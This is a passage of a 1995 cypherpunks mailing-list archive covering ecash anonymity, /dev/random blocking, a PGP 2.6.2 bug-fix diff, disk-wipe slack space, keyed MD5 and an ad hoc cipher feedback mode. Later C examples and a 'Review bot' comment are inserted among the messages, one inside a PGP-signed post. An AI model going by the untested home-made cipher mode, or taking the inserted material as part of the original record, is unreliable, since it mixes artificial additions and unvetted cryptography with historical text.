perpetrator, let's see... it's Ed.  Ed is now charged with theft and
has an expensive and uncertain legal experience ahead of him.

Are you sure you want to put yourself in this position?  You might win,
but it could still be expensive (ask PRZ).  And if your service is seen
as a fencing operation to receive stolen goods with the legitimate uses
just a "cover", you could lose.

Also, I believe in normal use Digicash coins are marked as being for a
specific recipient.  This is not certain since no details have been
released.  And apparently it can be worked-around by the spender by
marking the recipient as just "@" (or some such string).  If this feature
is present in the Mark Twain cash then the payee-anonymity service may
not be very effective.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 1 Nov 1995 02:39:08 +0800
To: cypherpunks@toad.com
Subject: Re: payee anonymity
Message-ID: <acbb9978030210043e77@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:35 PM 10/31/95, Hal wrote:
>Another way payees could be anonymous would be to immediately spend their
>received coins, and do so anonymously.  This works for the online ecash
>system.  They simply pass the coins on without first exchanging them at
>the bank.  There would have to be something they wanted to buy that they
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>could receive anonymously, though.
>

Such as other coins?

(Since I hate cryptic one-liners, I'll elaborate. There seem to be enough
"degrees of freedom" involved in exchange of digital coins such that payee
and payer anonymity is achievable. "Coin mixes" using "shell game" methods
seem adequate. One puts N coins in, gets back N coins, spot checks the
validity of some of the coins by redeeming them, and everyone is happy.
Fraud is contained to manageable proportions.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike_Spreitzer.PARC@xerox.com
Date: Wed, 1 Nov 1995 02:56:13 +0800
To: tytso@mit.edu
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <9510310316.AA26268@dcl.MIT.EDU>
Message-ID: <95Oct31.094528pst."14855(1)"@alpha.xerox.com>
MIME-Version: 1.0
Content-Type: text/plain


Blocking vs. non-blocking is a standard issue in design of U*X devices.
Standard solution: make it block by default, and accept an IOCTL to put it in
non-blocking mode.  There's even a POSIX way to do this:

	flags_or_err = fcntl(fd, F_GETFL, 0);
	if (flags_or_err == -1) { /* check for error */ }
	res = fcntl(fd, F_SETFL, flags_or_err | O_NONBLOCK);
	if (res == -1) { /* check for error */ }
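
The following is an added example, not part of the message above or of any /dev/random driver. It applies the fcntl() sequence to the read side of a pipe (a constructed stand-in for the entropy device, which the thread says behaves like a named pipe) and shows that with O_NONBLOCK the read itself reports "nothing available", so the check-then-read race raised earlier in the thread does not arise. The function names and result codes are assumptions made for the example.

```c
/* Added example: non-blocking reads on a pipe that stands in for the
 * entropy device. All names and result codes here are hypothetical. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

enum { TRY_WOULD_BLOCK = -1, TRY_EOF = -2, TRY_ERROR = -3 };

/* The F_GETFL / F_SETFL sequence, with both error checks filled in. */
int set_nonblocking(int fd)
{
    int flags = fcntl(fd, F_GETFL, 0);
    if (flags == -1)
        return -1;
    return fcntl(fd, F_SETFL, flags | O_NONBLOCK) == -1 ? -1 : 0;
}

/* One read attempt that never sleeps (want must be > 0).
 * Returns the byte count (possibly short), or one of the TRY_* codes.
 * No separate "is data available?" test is made, so there is no window
 * in which another reader can drain the source between check and read. */
long try_read(int fd, void *buf, size_t want)
{
    ssize_t n;

    do {
        n = read(fd, buf, want);
    } while (n == -1 && errno == EINTR);

    if (n > 0)
        return (long)n;
    if (n == 0)
        return TRY_EOF;              /* the FreeBSD answer in the thread */
    if (errno == EAGAIN || errno == EWOULDBLOCK)
        return TRY_WOULD_BLOCK;      /* nothing available right now */
    return TRY_ERROR;
}

/* Constructed scenario: a pipe holding `available` bytes plays the pool.
 * Performs `nreads` attempts of `want` bytes and returns the last result. */
long pool_read_result(size_t available, size_t want, int writer_closed,
                      int nreads)
{
    int p[2];
    unsigned char buf[64], fill[64] = {0};
    long r;

    if (available > sizeof fill || want > sizeof buf || pipe(p) == -1)
        return TRY_ERROR;
    if (set_nonblocking(p[0]) == -1 ||
        (available && write(p[1], fill, available) != (ssize_t)available)) {
        close(p[0]);
        close(p[1]);
        return TRY_ERROR;
    }
    if (writer_closed)
        close(p[1]);

    for (r = TRY_ERROR; nreads > 0; nreads--)
        r = try_read(p[0], buf, want);

    close(p[0]);
    if (!writer_closed)
        close(p[1]);
    return r;
}

int main(void)
{
    printf("empty pool             : %ld\n", pool_read_result(0, 8, 0, 1));
    printf("3 bytes, want 8        : %ld\n", pool_read_result(3, 8, 0, 1));
    printf("second read after short: %ld\n", pool_read_result(3, 8, 0, 2));
    printf("empty, writer closed   : %ld\n", pool_read_result(0, 8, 1, 1));
    return 0;
}
```

A caller that needs a fixed number of bytes loops on try_read() and decides for itself what to do on TRY_WOULD_BLOCK, rather than treating a short read as complete.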




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@c2.org
Date: Wed, 1 Nov 1995 03:33:40 +0800
To: cypherpunks@toad.com
Subject: RE: This PROMISes to be odius
Message-ID: <199510311823.KAA17396@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>PR   10/18 0809  ORACLE INTRODUCES SOFTWARE TOOL FOR LAW ENFORCEMENT

Oracle should change its corporate motto to:
"Oracle, bringing Big Brother to life" or
something similar. The problem with this sort of
software is that it is virtually made to be abused.

It is very, very obvious that the profit motive and
the reassurances of LEO's have totally blinded any 
shred of ethics the corporation might have once
entertained.

My reaction to this is simple. In the 70's, it was
acceptable reasoning for computer professionals to
not work in certain sectors of the industry because
they didn't want to be a part of the "military industrial
complex". 

The 90's version of that is simply not to buy products
from vendors who engage in unacceptable practices.
Oracle clearly falls in this latter category.

I had been looking very strongly at specifying a 
DB made by one of Oracle's competition due to experience
with its nightmarish installation procedures, but this
pretty much clinches the deal where nothing else would.

The funny thing here is that since this is just a current
sale, and since there's already plenty of technical 
reasons to look at competing products, I'd bet even 
money that over a relatively short amount of time 
I can offset ALL of the sales for this odious LEO
product alone.

I would encourage others to do the same.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Castleberry <jcastle@in-system.com>
Date: Wed, 1 Nov 1995 03:37:13 +0800
To: cypherpunks@toad.com
Subject: PGP 2.6.2 signator replacement bug fix
Message-ID: <9510311803.AA11158@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Here's a fix for a minor bug in PGP 2.6.2.  I reported it to pgp-bugs last
February and they responded promptly, but it hasn't been propagated to the
release - I suppose 2.6.2 is "in the freezer".

Anyway, the bug can cause a crash and other folks might like to put in the
fix, so here it is.  Anyone have any others?

Jim Castleberry
jcastle@in-system.com

Original bug report starts here:
- -------------------------------------------------------------------------

I believe I've identified a bug in PGP 2.6.2.  The bug occurs on my system:
	HP 9000/735, running HPUX 9.03
	MIT PGP 2.6.2
	Compiled with either the native cc or gcc 2.6.3
	Optimization level doesn't change the behavior (from -O0 to +O3).
	pubring.pgp contains all the keys on the servers, plus a few
	   unpublished keys and some additional signatures.

When an existing signature is replaced by a newer one by the same signator,
memory gets corrupted.  On my system, this results in a program abort.

The problem is in file keyadd.c, function mergesigs().  When a signature is
(possibly) going to be replaced, user_from_keyID() is called to get a pointer
to the signator's user ID (as a C string in the in-memory user hash table).
Then that pointer is passed to check_key_sig(), which passes it to
getpublickey(), which passes it to readpublickey(), which reads successive
user ID strings into it while it searches for the desired keyID.  But the hash
table contains dynamically allocated strings that are only as long as the
string they hold.  So when a longer user ID is read into it, memory past the
end of the C string is corrupted.  That trashes a hash table entry ("struct
hashent"), destroying pointers and resulting in an illegal memory access later
in the program.

The offending code in mergesigs() only gets executed when a signature is being
replaced with a more recent one by the same signator.  It only showed up
because I updated my pubring with all new keys on the servers for the last 31
days, and one key has an updated sig on it:
   pub  1024/AB1F4831 1993/05/10 Robert Walking-Owl <rrothenb@ic.sunysb.edu>
			         Robert Walking-Owl <robert.rothenburg@asb.com>

Here's a context diff for the fix.  The signator userid isn't needed by
check_key_sig() or the functions it calls since the signator's keyID is given,
and if the userid is NULL then readkeypacket() ignores it, so just pass NULL to
check_key_sig() and use the signator C string in mergesigs() as-is.

Jim Castleberry

- - cut here -------------------------------------------------------------------

*** old/keyadd.c	Wed Oct  5 20:48:11 1994
- --- keyadd.c	Wed Feb 15 22:37:53 1995
***************
*** 196,206 ****
  			    status = check_key_sig(fring,
  						   KeyIDpos, KeyIDlen,
  						   userid, fkey, keypos,
! 						   ringfile, signator,
  						   (byte *) & xstamp,
  						   &sigClass);
  			PascalToC(userid);
- - 			PascalToC(signator);
  			if (!status) {
  			    fprintf(pgpout,
  				    LANG("Replacing signature from %s\n"),
- --- 196,205 ----
  			    status = check_key_sig(fring,
  						   KeyIDpos, KeyIDlen,
  						   userid, fkey, keypos,
! 						   ringfile, NULL,
  						   (byte *) & xstamp,
  						   &sigClass);
  			PascalToC(userid);
  			if (!status) {
  			    fprintf(pgpout,
  				    LANG("Replacing signature from %s\n"),
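
Review bot: the new `ringfile, NULL,` argument to check_key_sig() carries no comment explaining that the signator buffer is withheld on purpose, so a later cleanup could put `signator` back and reintroduce the overrun of the hash-table string described in the report above. A one-line comment at the call would pin that down and would also explain why `PascalToC(signator);` is dropped. The hunk also leaves the underlying hazard in place: per the report, readpublickey() copies user IDs into whatever buffer it is handed without knowing its size, so it is worth checking in a follow-up that no other caller passes it a string obtained from user_from_keyID().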

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Wed, 1 Nov 1995 05:58:16 +0800
To: cypherpunks@toad.com
Subject: Re: FCPUNX:Macintosh [and perhaps other OS] Security Alert (fwd)
Message-ID: <Pine.SUN.3.91.951031111730.1148V-100000@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain




==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================

---------- Forwarded message ----------
Date: Sat, 28 Oct 1995 11:12:00 -0400
From: Sal Denaro <Sal@panix.com>
To: Ray Arachelian <sunder@amanda.dorsai.org>
Subject: Re: FCPUNX:Macintosh [and perhaps other OS] Security Alert (fwd)

> ---------- Forwarded message ----------
> Date: Sun, 15 Oct 1995 01:05:06 -0400
> From: Lucky Green <shamrock@netcom.com>
> To: cypherpunks@toad.com
> Subject: Macintosh [and perhaps other OS] Security Alert
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> A number of months ago, I discovered that various Macintosh "unused
> diskspace" wipe utilities (Norton, Burn) fail to wipe the unused
> slackspace at the end of the last block allocated to a file. This leaves
> NumberOfFiles*512Bytes/2 = several kB of recoverable data on your average
> drive.
> 

I can verify that this is a cross-platform bug. The Dos/win3.1 and
Win95 versions all have the same flaw. 

-- 
Salvatore Denaro		
sal@panix.com                    Spinning dreams with angel wings
Yes, I use PGP                     torn blue jeans/a foolish grin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Wed, 1 Nov 1995 07:49:33 +0800
To: nobody@replay.com
Subject: Re:  InfoWar
Message-ID: <9510311924.AA09550@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


 
>Industry representatives played down the privacy loopholes.
>Ronald Plesser, a Washington attorney who represents online
>services and direct marketing firms, said, "I know of no
>example of anybody trafficking in e-mail descriptions." A
>spokeswoman for Hughes Electronics Corp.'s DirecTV said, "We
>do not release names of customers that ordered movies.
 
The name of the customer of a video tape rental may be disclosed
only under narrow constraints (USC 18 Chap 121 2710):

   *  (b) Video Tape Rental and Sale Records. - (1) A video tape service
     provider who knowingly discloses, to any person, personally identifiable
     information concerning any consumer of such provider shall be liable to
     the aggrieved person for the relief provided in subsection (d).
 
     (2) A video tape service provider may disclose personally identifiable
     information concerning any consumer -
        o  (A) to the consumer;
        o  (B) to any person with the informed, written consent of the consumer
          given at the time the disclosure is sought;
        o  (C) to a law enforcement agency pursuant to a warrant issued under
          the Federal Rules of Criminal Procedure, an equivalent State warrant,
          a grand jury subpoena, or a court order;
        o  (D) to any person if the disclosure is solely of the names and
          addresses of consumers and if -
             +  (i) the video tape service provider has provided the consumer
               with the opportunity, in a clear and conspicuous manner, to
               prohibit such disclosure; and
             +  (ii) the disclosure does not identify the title, description,
               or subject matter of any video tapes or other audio visual
               material; however, the subject matter of such materials may be
               disclosed if the disclosure is for the exclusive use of
               marketing goods and services directly to the consumer;
        o  (E) to any person if the disclosure is incident to the ordinary
          course of business of the video tape service provider; or
        o  (F) pursuant to a court order, in a civil proceeding upon a showing
          of compelling need for the information that cannot be accommodated by
          any other means, if -
             +  (i) the consumer is given reasonable notice, by the person
               seeking the disclosure, of the court proceeding relevant to the
               issuance of the court order; and
             +  (ii) the consumer is afforded the opportunity to appear and
               contest the claim of the person seeking the disclosure. If an
               order is granted pursuant to subparagraph (C) or (F), the court
               shall impose appropriate safeguards against unauthorized
               disclosure.
 
               (3) Court orders authorizing disclosure under subparagraph (C)
               shall issue only with prior notice to the consumer and only if
               the law enforcement agency shows that there is probable cause to
               believe that the records or other information sought are
               relevant to a legitimate law enforcement inquiry. In the case of
               a State government authority, such a court order shall not issue
               if prohibited by the law of such State. A court issuing an order
               pursuant to this section, on a motion made promptly by the video
               tape service provider, may quash or modify such order if the
               information or records requested are unreasonably voluminous in
               nature or if compliance with such order otherwise would cause an
               unreasonable burden on such provider.
   *  (c) Civil Action. - (1) Any person aggrieved by any act of a person in
     violation of this section may bring a civil action in a United States
     district court.
 
In other words it can be a federal crime to release personal info.
(Without regard to ordering movies over the internet)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 1 Nov 1995 07:48:45 +0800
To: Kevin L Prigge <klp@gold.tc.umn.edu>
Subject: PGP On shared machines (was Re: Keyed-MD5, ITAR, and HTTP-NG)
In-Reply-To: <3095c7353a43002@noc.cis.umn.edu>
Message-ID: <Pine.SOL.3.91.951031113820.1151B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


One important thing to note in an academic environment is that if you 
have foreign students who are on non-green card visas, you may need to 
get an export licence if they can access the server. I expect you'll 
probably get the licence without too much hassle, and you're unlikely to 
be indicted for this, but it's something to be aware of.

Simon
----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 
	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michael shiplett <walrus@ans.net>
Date: Wed, 1 Nov 1995 02:12:43 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510302351.AA28243@zorch.w3.org>
Message-ID: <199510311647.LAA01071@fuseki.aa.ans.net>
MIME-Version: 1.0
Content-Type: text/plain


"h" == hallam  <hallam@w3.org> writes:

h> There is some work by Phil Rogaway on making keyed digest
h> functions which I strongly recommend people look at. I can post a
h> paper on the subject if people are interested.

There's also ``Message Authentication with MD5'' by Burt Kaliski and
Matt Robshaw in RSA Laboratories' CryptoBytes,
http://www.rsa.com/rsalabs/cryptobytes/spring95/md5.htm

michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 1 Nov 1995 08:27:05 +0800
To: rsalz@osf.org>
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510310430.AA08480@sulphur.osf.org>
Message-ID: <9510311650.AA32634@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>How are you going to handle mechanism negotiation?

This is a must do item, Simon is having to do >lots< of this.

One way of looking at HTTP is as a huge negotiation mechanism. Another way to
look at HTTP is as a large doughnut with sugar frosting, the first is more widely 
accepted.


There has to be more than one crypto mechanism so don't choose. In fact I forgot to 
add our favourite algorithms, such as Skipjack in OFB mode to the list :-)


What DES modes should be bothered with? I always feel that the lumping in of every 
cipher mode under the sun is an irritation. We need a transparent cipher, looking 
very much like a stream cipher (hence the probable reason for Simon hankering after 
RC4). We could use CFB or OFB. 

I don't like OFB myself, it seems to be a bit lame to only XOR a stream of pseudo 
random stuff with the plaintext. CFB also has the stream cipher like property that 
incomplete blocks can be decoded provided that the stride is set right, this means 
that for a 64 bit block cipher one is 8 times slower :-(


Anyone any ideas on the following ?

SEQ
    x = IV
    SEQ
    	c[i] = E(x,K) XOR p[i]
    	x = c[i] 

This is essentially OFB mode but instead of having an XOR with an alleged random 
number generator (which I find disturbing), there is a mix in of the output.

Other mixes to try ?

	x = c[i] XOR E(x,K)

OFB is the following BTW :-

	x = E(x,K)


Note that there may be value in keeping the IV secret in this case. There is probably 
some hack that means that the IV can be finessed but it looks like work.

		Phill
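
The following is an added example, not code from the message above or from any HTTP-NG implementation. It runs the three feedback rules written in the message over constructed data and measures two properties that separate them: how far a one-bit ciphertext error spreads on decryption, and whether the keystream depends on earlier plaintext. XTEA rounds serve as a stand-in for the 64-bit block cipher E(x,K); the key, IV, plaintext and all function names are assumptions, and the third rule is read with E(x,K) being the same block that produced c[i]. Standard references call the first rule (feeding back the whole ciphertext block) full-block CFB.

```c
/* Added example: compare x = E(x,K), x = c[i], and x = c[i] XOR E(x,K). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NBLK 4
enum mode { MODE_OFB, MODE_CT_FEEDBACK, MODE_MIX };

/* Constructed key, IV and plaintext blocks (not taken from the thread). */
static const uint32_t KEY[4] = {0x01234567u, 0x89abcdefu,
                                0xfedcba98u, 0x76543210u};
static const uint64_t IV = 0x0f1e2d3c4b5a6978ull;
static const uint64_t PT[NBLK] = {0x4745542068747470ull, 0x2d6e672064656d6full,
                                  0x20626c6f636b2033ull, 0x20626c6f636b2034ull};

/* Stand-in for E(x,K): 32 XTEA rounds on one 64-bit block. */
static uint64_t E(uint64_t x, const uint32_t k[4])
{
    uint32_t v0 = (uint32_t)(x >> 32), v1 = (uint32_t)x, sum = 0;
    for (int i = 0; i < 32; i++) {
        v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + k[sum & 3]);
        sum += 0x9E3779B9u;
        v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + k[(sum >> 11) & 3]);
    }
    return ((uint64_t)v0 << 32) | v1;
}

/* c[i] = E(x,K) XOR p[i], then update x by the chosen rule.
 * in and out must be different arrays. */
void stream_crypt(enum mode m, int decrypt, const uint64_t *in, uint64_t *out)
{
    uint64_t x = IV;
    for (int i = 0; i < NBLK; i++) {
        uint64_t ks = E(x, KEY);
        out[i] = in[i] ^ ks;
        uint64_t c = decrypt ? in[i] : out[i];   /* ciphertext block i */
        if (m == MODE_OFB)
            x = ks;                  /* x = E(x,K) */
        else if (m == MODE_CT_FEEDBACK)
            x = c;                   /* x = c[i] */
        else
            x = c ^ ks;              /* x = c[i] XOR E(x,K), which is p[i] */
    }
}

/* 1 if decrypt(encrypt(PT)) == PT and the ciphertext differs from PT. */
int roundtrip_ok(enum mode m)
{
    uint64_t ct[NBLK], back[NBLK];
    stream_crypt(m, 0, PT, ct);
    stream_crypt(m, 1, ct, back);
    return memcmp(back, PT, sizeof back) == 0 &&
           memcmp(ct, PT, sizeof ct) != 0;
}

/* Flip one bit in ciphertext block 1 and count the plaintext blocks that
 * come out wrong: a measure of error propagation. */
int damaged_blocks(enum mode m)
{
    uint64_t ct[NBLK], back[NBLK];
    int n = 0;
    stream_crypt(m, 0, PT, ct);
    ct[1] ^= 1;
    stream_crypt(m, 1, ct, back);
    for (int i = 0; i < NBLK; i++)
        n += back[i] != PT[i];
    return n;
}

/* Encrypt two messages that differ only in block 0. Block 1 is identical
 * in both, so c[1] differs exactly when the keystream for block 1 does. */
int keystream_depends_on_plaintext(enum mode m)
{
    uint64_t other[NBLK], ct_a[NBLK], ct_b[NBLK];
    memcpy(other, PT, sizeof other);
    other[0] ^= 0xff;
    stream_crypt(m, 0, PT, ct_a);
    stream_crypt(m, 0, other, ct_b);
    return ct_a[1] != ct_b[1];
}

int main(void)
{
    static const char *name[] = {"x = E(x,K)", "x = c[i]", "x = c[i]^E(x,K)"};
    for (int m = MODE_OFB; m <= MODE_MIX; m++)
        printf("%-16s roundtrip=%d damaged=%d ks_depends_on_pt=%d\n",
               name[m], roundtrip_ok((enum mode)m),
               damaged_blocks((enum mode)m),
               keystream_depends_on_plaintext((enum mode)m));
    return 0;
}
```

With four blocks and the error in block 1, the third rule damages every block from the error to the end of the message, because its feedback value is the recovered plaintext itself.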




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike_Spreitzer.PARC@xerox.com
Date: Wed, 1 Nov 1995 04:59:25 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510310427.AA28252@zorch.w3.org>
Message-ID: <95Oct31.115132pst."14646(5)"@alpha.xerox.com>
MIME-Version: 1.0
Content-Type: text/plain


Isn't this what the GSS-API is about?  Couldn't HTTP-NG just convey GSS
"tokens", and do something about getting both sides to agree on which GSS
"mechanism" is to be used, and on what Principals are involved?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Wed, 1 Nov 1995 03:21:41 +0800
To: aba@atlas.ex.ac.uk
Subject: Re: Four Horsemen (was Re: PA Remailer Concerns)
In-Reply-To: <3541.9510161053@exe.dcs.exeter.ac.uk>
Message-ID: <9510311715.AA01975@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Sorry I'm late to the gate on this one, but from what
I have read on the traffic concerning this law (I've been
out of town a good bit lately, so I am playing catch-up)
there's been a few aspects of this odious law that have
been overlooked.

What struck me in a most glaring manner are the constitutional
issues surrounding this law. Specifically, aside from the remailer
aspects of the law, they attempt to enact prior restraint on
the publication of plans for electronic devices & the like.

The aspects of the law that cover publication do not look
as if they can pass constitutional muster. Especially considering
the supreme court here has recently ruled that it is permissible
to publish unsigned political handbills and the like. Much like
what the output of an anonymous remailer produces after all.

Some of the issues they attempt to address in this law, are
done so poorly, and with such ignorance of legal precedent and
basic constitutional reference that I find it utterly amazing
that the governor would sign it, and that it would have been
forwarded to him in the form they enacted.

I do not think that the law is capable of surviving any sort of
legal test based on much of what they've inserted. But I guess
that's for the courts to decide.

In any case, considering it's Halloween, I would count the
Pennsylvania Governor lucky if Ben Franklin doesn't rise
from his grave and come strangle the bastard in his bed.

As it is, I'm sure old Ben could probably be used as a good
gyroscope with all the spinning in his grave that must be
going on. Pennsylvania the cradle of liberty? Hah, it looks
more like the cradle of repression to me. They sold liberty
and their souls in a devil's bargain for an illusory peace of
mind with this one.


Tim Scanlon



________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: madden@mpi-sb.mpg.de (Peter Madden)
Date: Tue, 31 Oct 1995 20:33:52 +0800
To: cypherpunks@toad.com
Subject: Turing Award
Message-ID: <199510311219.NAA02181@mpii02024.ag2.mpi-sb.mpg.de>
MIME-Version: 1.0
Content-Type: text/plain


Hi All,

Further to previous cypherpunk discussions on cryptography, and on program
checking/verification, the below announcement of this year's Turing Award
should be of interest (apologies if this is old news).

Pete

=================================================================

Dr Peter Madden,                                Email: madden@mpi-sb.mpg.de
Max-Planck-Institut fuer Informatik,            Phone: (49) (681) 302-5434
Im Stadtwald, W-66123 Saarbruecken, Germany.    Fax: (49) (681) 302-5401

=================================================================


----- Begin Included Message -----

>From seidel@cs.uni-sb.de Thu Oct 26 08:57:10 1995
Date: Thu, 26 Oct 1995 08:57:02 +0100
From: seidel@cs.uni-sb.de (Raimund Seidel)
To: profs@sol.cs.uni-sb.de
Subject: Turing Award
Content-Length: 4661

------- Forwarded Message
 
 
ACM'S A.M. Turing Award, computing's highest honor, goes to
Manuel Blum of University of California, Berkeley
Date: Saturday, October 21, 1995 3:55PM
 
BW1320  OCT 20,1995      15:22  PACIFIC      18:22  EASTERN
 
 
( BW)(ACM/TURING-AWARD/BLUM) ACM'S A.M. Turing Award, computing's
highest honor, goes to Manuel Blum of University of California, Berkeley
 
    Business Editors
 
    NEW YORK--(BUSINESS WIRE)--Oct. 20, 1995--Considered the Nobel
Prize of Computing, the A. M. Turing Award of the Association for
Computing Machinery (ACM), will be given to distinguished computer
scientist, Manuel Blum, of the University of California, Berkeley.
The award will be presented to Blum at a special awards ceremony
during the kick off of ACM's yearlong 50th anniversary celebration,
February 14-18, 1996 in Philadelphia.
    Blum was honored with the Turing Award "in recognition of his
contributions to the foundation of computational complexity theory
and its applications to cryptography and program checking."
computing devices, Blum's research has developed around a single
unifying theme: finding positive, practical consequences of living in
a world where all computational resources are bounded.  Blum shows
that secure business transactions, pseudo-random number generation,
and program checking are all possible precisely because all
computational devices are resource bounded.
    Blum is one of the founders of computational complexity theory, a
field that is central to theoretical computer science, and one which
deals with measuring the difficulty of performing computations.  His
work on machine-independent complexity yields a theory of
computational cost that is relevant also to practical problems.
Cryptographic protocols which are used in the transmission of
sensitive information are secure because they can be shown to be
information in a cryptographically encoded message without going
through an inordinately complex computation that would be
prohibitively costly and time consuming to perform.  For computer
programs it is very difficult to develop perfectly error-free
programs.  In this area Blum has shown how his techniques can be
applied to make programs more reliable, and to check their results.
Since this work is very fundamental one can expect that it will find
application to many other practical problems, as well.
    "Manuel Blum is a profound thinker,"  said ACM President Stuart
H. Zweben, chairman of the department of computer and information
science at Ohio State University, "his seminal work, insights and
approaches have brought about new avenues of research in the area of
computational complexity and established foundations for what people
can compute.  Furthermore, his work has influenced other Turing Award
winners to a significant degree."
    The ACM A. M. Turing Award is given annually for technical
achievements in the field of computing which are deemed by a jury of
leading professionals to be of lasting and significant importance to
the computing community.  It is accompanied by a prize of $25,000
contributed by AT&T.
    Dr. Blum is University of California at Berkeley's Arthur J.
Chick Professor in Electrical Engineering and Computing Sciences, a
Department in which he has served since 1968.  Dr.  Blum was born in
Caracas, Venezuela in 1938 and began his academic career at the
Massachusetts Institute of Technology, where he received his B.S.,
Warren S. McCulloch, Hartley Rogers Jr. and Marvin Minsky.  Dr.
Blum is renowned for his work on computational complexity, automata
theory, inductive inference, cryptography and program
result-checking.  During his career, Dr.  Blum has received numerous
awards, published 47 technical papers and advised 26 Ph.D.  students.
    ACM, founded in 1947, is an 85,000 member international
scientific and educational organization dedicated to advancing the
art, science, engineering and application of information technology.
ACM serves both professional and public interests by fostering the
open interchange of information and by promoting the highest
professional and ethical standards.  This is accomplished through its
many publications, conferences, special interest groups, chapters and
network communications.
 
    --30---rg/ny*
 
    CONTACT: Terrie Phoenix
             (212) 626-0531
             phoenix@acm.org
    KEYWORD: NEW YORK
    INDUSTRY KEYWORD: COMPUTERS/ELECTRONICS COMED
 
 
REPEATS: New York 212-575-8822 or 800-221-2462; Boston 617-236-4266 or
         800-225-2030; SF 415-986-4422 or 800-227-0845; LA 310-820-9473
     BW URL: http://www.hnt.com/bizwire
 
 
------- End of Forwarded Message
 


----- End Included Message -----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 1 Nov 1995 04:16:56 +0800
To: John Lull <lull@acm.org>
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <199510311650.IAA09144@ix2.ix.netcom.com>
Message-ID: <9510311855.AA00379@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>I would prefer to see MD5 deleted.  A 128 bit hash simply seems too
>marginal in length for long term use in most hash applications.  I
>would much rather see something like Haval as a second hash algorithm.
>It can be faster than MD5, and can easily be tailored to the hash
>width you want.  If 128 bit hashes are really needed, use Haval's
>128-bit option.

MD5 is pretty well entrenched in IETF circles and since RSAREF only
provides MD2, MD4 and MD5 there has to be an option to use at least 
one of them. MD5 is the best of that set IMHO.

For Phil Rogaway's comments on keyed MD5 see :-

http://wwwcsif.cs.ucdavis.edu/~rogaway/papers/draft-rogaway-ipsec-comments-00.txt

Unfortch much of the information he gave in his talk appears not to be there. 
C'est la vie as they say in Canada.

Also the cryptobytes article Michael found an online for is well worth 
a look. http://www.rsa.com/rsalabs/cryptobytes/spring95/md5.htm
I would have quoted it but I didn't know it was available in e-form. The
cryptobytes articles are well worth reading in general.

Also on Phil's page:
http://wwwcsif.cs.ucdavis.edu/~rogaway/papers/list.html

 Mihir Bellare, Roch Guerin and Phillip Rogaway
     XOR MACs: New methods for message authentication using finite pseudorandom functions,
     Crypto '95. 


	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 1 Nov 1995 07:11:30 +0800
To: cypherpunks@toad.com
Subject: Cryto article in SJ Mercenary
Message-ID: <Pine.SOL.3.91.951031140028.1151G-100000@chivalry>
